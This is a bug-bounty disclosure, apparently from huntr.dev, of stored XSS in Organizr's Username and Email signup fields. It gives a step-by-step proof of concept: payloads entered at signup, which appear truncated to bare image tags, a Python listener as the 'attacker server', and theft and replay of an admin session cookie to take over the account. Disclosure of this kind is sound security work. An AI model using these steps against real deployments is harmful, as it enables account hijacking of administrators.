Lucene search

K
huntrSampritdas86059501F-05D2-4E76-AE03-5EB64835E6BF
HistoryApr 10, 2022 - 10:28 a.m.

Stored XSS in the "Username" & "Email" input fields leads to account takeover of Admin & Co-admin users

2022-04-1010:28:34
sampritdas8
www.huntr.dev
25

0.001 Low

EPSS

Percentile

40.6%

Description

The application Organizr allows malicious javascript in the “Username” & “Email” input fields for which an attacker can able to take over the account of Admin & Co-admin users.

Proof of Concept

1.During “Signup” put the below payloads in the “Username” & “Email” input fields.

<img src>

<img src>

2.Now run the attacker server by command: python3 -m http.server 3333

3.Then login with admin user and go to “Settings” -> “User Management”

4.Now xss will trigger, after that check attacker server you will see the admin session cookie

5.Copy the cookie and open inspect element from attacker account and replace the cookie of attacker with admin and reload the page

6.Then admin account will open.

PoC Video:

https://drive.google.com/file/d/10mcWCpsTO95xuDIMcd4MAEJPE5_2OM7A/view?usp=sharing

0.001 Low

EPSS

Percentile

40.6%

Related for 6059501F-05D2-4E76-AE03-5EB64835E6BF